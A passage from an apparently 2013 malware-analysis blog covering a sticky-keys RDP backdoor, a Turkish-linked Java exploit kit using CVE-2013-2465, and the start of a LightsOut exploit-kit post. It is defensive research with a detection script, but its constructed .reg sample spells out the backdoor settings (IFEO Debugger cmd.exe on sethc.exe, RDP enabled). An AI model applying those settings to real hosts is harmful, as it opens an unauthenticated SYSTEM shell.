A number of commands are executed to enable Windows Terminal Services and delete the encoded Initial Payload. One of the registry changes makes the login screen spawn a '<span style="color: #3d85c6;">Windows Command Prompt</span>' when a key is pressed a few times - the so-called '<span style="color: #3d85c6;">sticky keys</span>' <a href="http://blogs.mcafee.com/mcafee-labs/windows-vista-vulnerable-to-stickykeys-backdoor" rel="nofollow" target="_blank">backdoor</a>. With Terminal Services switched on at the same time, that prompt runs as SYSTEM at the RDP login screen, before any credentials are entered.<br />
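<br />
Added example (my own Python, not the sample's commands): a check that flags the two registry changes this combination needs. The page does not show the exact keys the sample writes, so the check uses the well-known locations for the technique - an '<span style="color: #3d85c6;">Image File Execution Options</span>' '<span style="color: #3d85c6;">Debugger</span>' value on a logon-screen accessibility binary, and the '<span style="color: #3d85c6;">fDenyTSConnections</span>' RDP flag - and runs over a constructed '<span style="color: #3d85c6;">.reg</span>' export so it works offline. Key paths and the sample export are assumptions in that sense.<br />

```python
"""Flag the registry changes a 'sticky keys' backdoor leaves behind.

Added example, not the sample's own commands. The sample enables Terminal
Services and makes the login screen spawn cmd.exe; the page does not show the
exact keys it writes, so this check uses the well-known locations for the
technique: an Image File Execution Options (IFEO) 'Debugger' value on a
logon-screen accessibility binary, and the RDP fDenyTSConnections flag. It
runs over a constructed .reg export so it works offline; on a live host the
same paths can be read with reg.exe or Get-ItemProperty.
"""
from typing import Dict, List

# Accessibility binaries that can be launched from the logon screen before
# anyone authenticates; sethc.exe is the one behind 'sticky keys' (Shift x5).
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
}
IFEO_PATH = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
             r"\CurrentVersion\Image File Execution Options")
TS_PATH = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

# Constructed .reg export (not captured from the sample): a benign IFEO entry
# mixed with the two changes the backdoor needs.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000002
"""


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the [key] / "name"=value layout of a .reg file into {key: {name: value}}."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, _, value = line.partition("=")
            keys[current][name.strip().strip('"')] = value.strip()
    return keys


def find_backdoor_indicators(keys: Dict[str, Dict[str, str]]) -> List[str]:
    """Return one finding per suspicious entry; an empty list means nothing matched."""
    findings: List[str] = []
    ifeo_prefix = IFEO_PATH.lower() + "\\"
    for key, values in keys.items():
        lowered = key.lower()
        if lowered == TS_PATH.lower() and values.get("fDenyTSConnections") == "dword:00000000":
            findings.append("Remote Desktop enabled (fDenyTSConnections=0)")
        if lowered.startswith(ifeo_prefix):
            binary = lowered[len(ifeo_prefix):]
            debugger = values.get("Debugger")
            if binary in ACCESSIBILITY_BINARIES and debugger is not None:
                findings.append(f"IFEO Debugger set for {binary}: {debugger}")
    return findings


def scan_reg_export(text: str) -> List[str]:
    """Convenience wrapper: parse an export and return its findings."""
    return find_backdoor_indicators(parse_reg_export(text))


if __name__ == "__main__":
    for finding in scan_reg_export(SAMPLE_REG_EXPORT):
        print(finding)
```

One caveat: the older variant of this backdoor copies '<span style="color: #3d85c6;">cmd.exe</span>' over '<span style="color: #3d85c6;">sethc.exe</span>' instead of touching IFEO, which leaves no registry trace at all; for that, compare the hash of '<span style="color: #3d85c6;">sethc.exe</span>' in '<span style="color: #3d85c6;">System32</span>' against a known-good copy as well.<br />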
<br />
<b><span style="color: #3d85c6;">"Summary"</span></b><br />
<br />
<style type="text/css">.nobrtable br { display: none }</style>
<br />
<div class="nobrtable">
<table align="center" border="2" bordercolor="#FFFFFF" cellpadding="3" cellspacing="3" style="background-color: black; width: 100%;">
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>General Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Unknown</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2013-10-03</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-10-07</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">Live Fiddler capture</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;"><pre>'sticky keys' - login bypass</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">plain text</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.7.17</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">XOR single value key - 0x12</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">c:\users\public\</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Hardcoded - 'svchost.exe'</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Not implemented</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>None</pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>(JAR)MD5 - 839d43c69935a8a93e0b9f6c3d715c53
virustotal.com - <a href="https://www.virustotal.com/en/file/ff81f9e57122ef4fbff84c934d2e9989370184010e1cb4faf74a468d0931912a/analysis/" rel="nofollow" target="_blank">link</a>
(EXE)MD5 - 27af067a2dd507862290779679c68b6d
virustotal.com - <a href="https://www.virustotal.com/en/file/3dd4e97d66ac846a4deb95a7ee1f2c0688cd8b48cae608be23473c1fbb627f84/analysis/" rel="nofollow" target="_blank">link</a></pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;"><pre>Some of the code used seems to be
coming from Chinese websites sharing
public Java code samples</pre>
</td>
</tr>
</tbody></table>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-32461922732438225232013-10-07T12:55:00.001+01:002013-10-07T12:55:13.441+01:00Unknown EK: "I wanna be a billionaire so freaking bad..."NOTE: Information is based on a sample captured on 2013-10-02<br />
<br />
I'm not sure the term '<span style="color: #3d85c6;">exploit kit</span>' actually applies here. Yes, there is exploit code copied from the PSA (Packet Storm Advisory) for '<span style="color: #3d85c6;">CVE-2013-2465</span>', but I'd expect more code around it before calling it a '<span style="color: #3d85c6;">kit</span>', and I can't imagine any server-side code exists. There is no environment validation of any sort: no plugin and version identification, no initial payload encryption, no data encoding, no code obfuscation. Base64 encoding is used just once, to '<span style="color: #3d85c6;">hide</span>' a single string. So, another '<span style="color: #3d85c6;">interesting</span>' piece of work.<br />
<br />
<b><span style="color: #3d85c6;">"Landing page"</span></b><br />
<br />
The URL pattern is short and simple.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIghGtR-OCXFvmwlj7kwKrBeP4n5YS2VNT2Iq07yl_Cl98YgnDRmVvrB0OLgX9PrCUx-3Q77f02G6OFUNiRfZLeMx3cTQDqIazjUOVCz1NYcpbslkgnbNPXypWSZ0OKHvmI5PLdcUb0qQ_/s1600/Unknown-2013-10-02_URL_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIghGtR-OCXFvmwlj7kwKrBeP4n5YS2VNT2Iq07yl_Cl98YgnDRmVvrB0OLgX9PrCUx-3Q77f02G6OFUNiRfZLeMx3cTQDqIazjUOVCz1NYcpbslkgnbNPXypWSZ0OKHvmI5PLdcUb0qQ_/s1600/Unknown-2013-10-02_URL_pattern.png" height="36" width="320" /></a></div>
<br />
The landing page is also short and simple.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpFC7I_kzz_hKT9mhbahGYhGxGGJpZXNsllCTXHXpMNQRCj35oXeXLCjAuBSYof4yBy9dWT8Wdia-CVaJUIC10N1KE4qRqgV1yfrXE-UnbFvuPF6_9RWqO_oq7ZZ5OaiQThvcXW56JCL0E/s1600/Unknown-2013-10-02_landing_page.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpFC7I_kzz_hKT9mhbahGYhGxGGJpZXNsllCTXHXpMNQRCj35oXeXLCjAuBSYof4yBy9dWT8Wdia-CVaJUIC10N1KE4qRqgV1yfrXE-UnbFvuPF6_9RWqO_oq7ZZ5OaiQThvcXW56JCL0E/s1600/Unknown-2013-10-02_landing_page.png" height="26" width="320" /></a></div>
<br />
The parameter name is the first hint at the possible origin of this Java exploit: '<span style="color: #3d85c6;">kurban</span>' is Turkish for '<span style="color: #3d85c6;">victim</span>'. The value of this parameter is the Initial Payload location.<br />
<br />
<b><span style="color: #3d85c6;">"JAR file"</span></b><br />
<br />
The JAR file is '<span style="color: #3d85c6;">packed</span>' with goodies. Execution begins with an attempt to exploit the '<span style="color: #3d85c6;">CVE-2013-2465</span>' vulnerability.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFK72XJnpVj8rTREYf3TJxo6FYT5iafTW67jTVovgj1MGK0lpK59-kmmACMADgqAzpReQ4JvWpQe3bbujhUlyHkGuWj7MO-hE7_uU08raEVRdQFsJqhgYr2RaFJdJt65lVABeE2aMghDE/s1600/Unknown-2013-10-02_CVE-2013-2465.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTFK72XJnpVj8rTREYf3TJxo6FYT5iafTW67jTVovgj1MGK0lpK59-kmmACMADgqAzpReQ4JvWpQe3bbujhUlyHkGuWj7MO-hE7_uU08raEVRdQFsJqhgYr2RaFJdJt65lVABeE2aMghDE/s1600/Unknown-2013-10-02_CVE-2013-2465.png" height="76" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">part of PSA exploit code for CVE-2013-2465</span></i></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;"><br /></span></i></div>
<div style="text-align: left;">
Just before diving into the '<span style="color: #3d85c6;">storeImageArray()</span>' exploit, a single call to '<span style="color: #3d85c6;">base64coder</span>' is made to decode the one and only encoded string.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9e1wn6gWW7nebbIgNxmGel5CWDhZihOaNBIPgAbAnPRZOBdVaZtQW7RvKc2susgptNJG4yGCe_QV4ZYF1P0b-I4mFXglppBz2Is-j6jFCQJku30l1kYvebNaMBgVAlS-Pwb5NiFk312ux/s1600/Unknown-2013-10-02_base64coder_call.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9e1wn6gWW7nebbIgNxmGel5CWDhZihOaNBIPgAbAnPRZOBdVaZtQW7RvKc2susgptNJG4yGCe_QV4ZYF1P0b-I4mFXglppBz2Is-j6jFCQJku30l1kYvebNaMBgVAlS-Pwb5NiFk312ux/s1600/Unknown-2013-10-02_base64coder_call.png" height="36" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The author was rushing because mum had just called him/her for dinner and didn't bother cleaning up someone else's '<span style="color: #3d85c6;">base64coder</span>' <a href="http://www.source-code.biz/base64coder/java/Base64Coder.java.txt" rel="nofollow" target="_blank">code</a>, which might have been copied from '<span style="color: #3d85c6;">source-code.biz</span>'. All the encoding methods were left in even though they are not used.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWrYsY-GxK8JzyGkIA35t_qWtth002JXjCGXhbxr2rH6Z5iaKTlGfwhPLp8BcYeAsKWUIDEyMluQW1rRhirW_F8H2OnsnNiy8ghyphenhyphene7aul3hYFfC7OLmqXIxaRXP5YeE9brv6UE1wPWA6oL/s1600/Unknown-2013-10-02_base64coder_methods.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWrYsY-GxK8JzyGkIA35t_qWtth002JXjCGXhbxr2rH6Z5iaKTlGfwhPLp8BcYeAsKWUIDEyMluQW1rRhirW_F8H2OnsnNiy8ghyphenhyphene7aul3hYFfC7OLmqXIxaRXP5YeE9brv6UE1wPWA6oL/s1600/Unknown-2013-10-02_base64coder_methods.png" height="298" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
A few more hints pointing at the origin of the code, or at least at one of the languages the author speaks.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEmpiW5F83MqUujJNYQpXYpuelmFJc-Rt9ZzXdULFJ7bw4JVXczaCGkyLunCzj7jNuNba17sXXttOkfIRZwQngk4z_5cSuTyDTY-POZeqIe4sCgaTNizNVFVAJSdKCrQ9a-vpE4TrAJ5T9/s1600/Unknown-2013-10-02_turkish_words.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEmpiW5F83MqUujJNYQpXYpuelmFJc-Rt9ZzXdULFJ7bw4JVXczaCGkyLunCzj7jNuNba17sXXttOkfIRZwQngk4z_5cSuTyDTY-POZeqIe4sCgaTNizNVFVAJSdKCrQ9a-vpE4TrAJ5T9/s1600/Unknown-2013-10-02_turkish_words.png" height="136" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Google translated from Turkish: '<span style="color: #3d85c6;">dosyayazdirici</span>' - printing a file, '<span style="color: #3d85c6;">baglantiaç</span>' - open link, '<span style="color: #3d85c6;">bayt</span>' - byte. The screenshot above is part of the code that fetches the Initial Payload via the URL passed from the landing page. Once downloaded, it is stored in the default temporary-file directory under the hardcoded filename '<span style="color: #3d85c6;">thefire.exe</span>'.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk-U0Vee0asi4nSiwtvK2sdoQbtUrChyphenhyphen1gZ3t6h0Lb6Mpde3Zc0bgY4CUWnZ9g6oMhFtz7vxiSMoKLqdKcnf25Xdy9KePfJof4gzmdrqINGl-lxANSoSqOanAjS2_6Z_orahkvg-L7GXpI/s1600/Unknown-2013-10-02_filename.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk-U0Vee0asi4nSiwtvK2sdoQbtUrChyphenhyphen1gZ3t6h0Lb6Mpde3Zc0bgY4CUWnZ9g6oMhFtz7vxiSMoKLqdKcnf25Xdy9KePfJof4gzmdrqINGl-lxANSoSqOanAjS2_6Z_orahkvg-L7GXpI/s1600/Unknown-2013-10-02_filename.png" height="52" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
The link to the Initial Payload was already dead by the time the capture was performed. Judging by the filename - '<span style="color: #3d85c6;">install_flash_player.exe</span>' - it could have been '<span style="color: #3d85c6;">ZeroAccess</span>'.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
One rather odd thing is the name of the method performing the exploit - '<span style="color: #3d85c6;">uganda</span>'. Maybe the author's favourite country, maybe the target, who knows.</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipDKWeuQ-FGMabQa9jYjQDCL5zV1siRSWt3K4Lav7uAeOVXSVsU-tSC-CkQeXR9MdFucVvJJtI4sMDoXew5SGBxzsBMDQIj7XXHkjYXMd8nsE9J2ugHzmO44BSzjJ1Xpg2R1mJQ_9tb6ra/s1600/Unknown-2013-10-02_odd_name.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipDKWeuQ-FGMabQa9jYjQDCL5zV1siRSWt3K4Lav7uAeOVXSVsU-tSC-CkQeXR9MdFucVvJJtI4sMDoXew5SGBxzsBMDQIj7XXHkjYXMd8nsE9J2ugHzmO44BSzjJ1Xpg2R1mJQ_9tb6ra/s1600/Unknown-2013-10-02_odd_name.png" height="68" width="320" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b><span style="color: #3d85c6;">"Summary"</span></b></div>
<div style="text-align: left;">
<br /></div>
<style type="text/css">.nobrtable br { display: none }</style>
<br />
<div class="nobrtable">
<table align="center" border="2" bordercolor="#FFFFFF" cellpadding="3" cellspacing="3" style="background-color: black; width: 100%;">
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>General Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">Unknown</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2013-10-02</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2013-10-04</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">Live Fiddler capture</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;"><pre>CVE-2013-2465</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Transfer mode:</td>
<td style="background-color: #b8cce4; color: black;">plain text</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">1</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Direct download - Firefox/14.0.1</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR hidden content:</td>
<td style="background-color: #b8cce4; color: black;">None</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">No</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">Default temporary-file directory</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Hardcoded - 'thefire.exe'</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Adobe infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Not implemented</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;"><br /></td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>Java JAR - <a href="https://www.virustotal.com/en/file/bfe1ba7b5082b8c3f2cffdd3e0e015437c7886f79737fad201dc27b54ea798a0/analysis/" rel="nofollow" target="_blank">virustotal.com</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>No sample available</pre>
</td>
</tr>
<tr>
<td><br /></td>
<td><br /></td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;"><pre>Possibly originated from Turkey or
the author speaks Turkish</pre>
</td>
</tr>
</tbody></table>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-89930315590441058162013-09-29T22:09:00.000+01:002013-10-14T13:32:07.882+01:00LightsOut EK: "By the way... How much is the fish!?"Thanks to <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a> for sharing details about this Exploit Kit.<br />
<br />
<i><u>Update 2013-10-14:</u></i><br />
Thanks to <a href="https://twitter.com/tlansec" rel="nofollow" target="_blank">@tlansec</a> for identifying this EK - LightsOut.<br />
<br />
NOTE: Information is based on the sample captured on 2013-09-27<br />
<br />
<a href="http://blogs.cisco.com/author/emmanueltacheau/" rel="nofollow" target="_blank">Emmanuel Tacheau</a>, a Threat Researcher at Cisco, <a href="http://blogs.cisco.com/security/watering-hole-attacks-target-energy-sector/" rel="nofollow" target="_blank">shared</a> his findings on this Exploit Kit in his latest blog post, linking it to a watering-hole attack aimed at the energy and oil industries. Below is the list of target types he identified:<br />
<ul>
<li>An oil and gas exploration firm with operations in Africa, Morocco, and Brazil;</li>
<li>A company that owns multiple hydro electric plants throughout the Czech Republic and Bulgaria;</li>
<li>A natural gas power station in the UK;</li>
<li>A gas distributor located in France;</li>
<li>An industrial supplier to the energy, nuclear and aerospace industries;</li>
<li>Various investment and capital firms that specialize in the energy sector.</li>
</ul>
Originally thinking that this Exploit Kit must be state-of-the-art code with all possible obfuscation in the world applied (taking the target types into account), I was a little bit disappointed to see another '<span style="color: #3d85c6;">somehow-somewhat</span>' job - unused code, copy-paste from '<span style="color: #3d85c6;">packetstormsecurity.com</span>', almost no Java code obfuscation, no use of encryption or encoding, etc.<br />
<br />
<b><span style="color: #3d85c6;">"It's the first page of the second chapter"</span></b><br />
<br />
The URL pattern below is specific to this particular EK sample.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ0iBV4amqH3TZXIwnEThvxN_l2xkwlvNa25-k2KFf4OhEh8L764e180AD32cbrZ8ES60dS_-OdqJ6UBOKUaDqpBwOsfwjkOfIZHFLWUNMqQzJS_PhuXZcFEy-oTIy89A7Lgaw0eWMHFCN/s1600/Unknown-2013-09-27_URL_pattern.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ0iBV4amqH3TZXIwnEThvxN_l2xkwlvNa25-k2KFf4OhEh8L764e180AD32cbrZ8ES60dS_-OdqJ6UBOKUaDqpBwOsfwjkOfIZHFLWUNMqQzJS_PhuXZcFEy-oTIy89A7Lgaw0eWMHFCN/s1600/Unknown-2013-09-27_URL_pattern.png" width="320" /></a></div>
<br />
There are two layers of landing pages. The first landing page is a single '<span style="color: #3d85c6;">&lt;iframe&gt;</span>' loading the second landing page.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga7IH7GKivxRlb1QvyjarfGhF0ccT0ebDJ7mNNLDJ3XMfR27UvJKytwvt-cNEirxCmKjroaiCxQybLvxgWZV8BasiNxuBegpTok8M-ZHoni2CUo_gcyCuS_x48ZTL3pZev0A2pJKmyYYfU/s1600/Unknown-2013-09-27_first_landing.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="87" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEga7IH7GKivxRlb1QvyjarfGhF0ccT0ebDJ7mNNLDJ3XMfR27UvJKytwvt-cNEirxCmKjroaiCxQybLvxgWZV8BasiNxuBegpTok8M-ZHoni2CUo_gcyCuS_x48ZTL3pZev0A2pJKmyYYfU/s1600/Unknown-2013-09-27_first_landing.png" width="320" /></a></div>
<br />
The JavaScript on the second landing page tries to identify the following before proceeding with any exploit attempt:<br />
<ul>
<li>Internet browser type</li>
